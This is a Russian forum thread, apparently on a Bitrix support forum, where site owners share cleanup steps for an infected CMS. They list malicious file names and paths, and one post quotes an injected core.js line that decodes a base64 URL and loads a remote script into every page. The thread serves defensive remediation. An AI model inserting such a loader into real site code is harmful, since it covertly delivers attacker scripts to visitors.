Цитата | ||
---|---|---|
написал:
|
20.09.2023 14:45:56
|
|||
|
04.07.2023 16:58:09
На что еще обратить внимание:
1. htaccess В папке upload файл htaccess c эталонного сайта в корне сайта должна иметь вид:
Техподдержка Битрикс порекомендовала поменять. 2. Файлы .access.php Могут содержать разрешения на запись на несуществующую группу. 3. В корне сайта вирусные файлы с именами: .500.php content.php 4. Внутри папок встречаются вирусные скрипты с именами в виде абракадабры /bitrix/components/bitrix/main.calendar/ /bitrix/components/bitrix/main.auth.changepasswd/ 5. В папке /bitrix/admin маскируется под нормальный файл blog_lothsome.php Такого файла не должно быть, вирусное содержание. Хорошо все ищется антивирусным сканнером с маркетплейса, кроме файлов htaccess и access |
|||||
|
28.06.2023 12:16:02
|
|||
|
11.06.2023 11:16:13
Если такового нет, то обращайтесь к специалистам, которые занимались разработкой и сопровождением сайта, чтобы они восстановили работу сайта. Если и таких нет, тогда надо таких найти. Специалистов по Битрикс, готовых решить вашу проблему достаточно. Стоимость восстановления будет сопоставимой со стоимостью продления лицензии, а скорее всего и больше. |
|||
|
28.05.2023 13:24:40
|
|||
|
28.05.2023 08:37:44
У меня была история с сайтом с просроченной лицензией. Поддержка попросила доступ, сами все почистили, указали, какие файл исправили, что удалили. Порекомендовали обновить сайт. Какие файлы? Все тоже самое, что здесь и обсуждалось. |
|||||||
|
27.05.2023 15:43:02
Пишите, напишите сюда ответ. Мне помогли, больше проблем нет. Если все обновили, а проблема остается, значит остался скрипт. Уже в этой ветки писали, как решить проблему. |
|||
|
02.03.2023 14:45:04
|
|||
|
23.10.2022 19:33:12
Алексей Вдовин, поддержка написала. Я сравнил с другими сайтами, незараженными - там нет его
|
|
|
23.10.2022 18:13:15
Михаил Базаров, И еще:
А также удалил вам вирусный файл /bitrix/components/bitrix/main.file.input/main.php |
|
|
23.10.2022 18:11:48
Алексей Анисимов, Не забывайте
А также удалил вам вирусный файл /bitrix/components/bitrix/main.file.input/main.php |
|
|
19.10.2022 13:04:29
|
|||
|
18.10.2022 16:23:37
Техподдержка Битрикс:
У вас в файле /bitrix/modules/main/include/prolog.php были добавлены строки вызывающие скрипт: // \n<sc ript src="
В файл /bitrix/js/main/core/core.js была добавлена строка: \bs=document.createElement(script);s.src=atob(aHR0cHM6Ly9zdG9yZWpzY2RuLnB3L2pxdWVyeXVpLmpz);document.head.appendChild(s);
Сайт заработал корректно только после ручного удаления вредоносных строк. А также удалил вам вирусный файл /bitrix/components/bitrix/main.file.input/main.php То есть у всех, кто писал выше не хватает удаления main.php |
|
|
28.10.2021 17:55:45
|
|||
|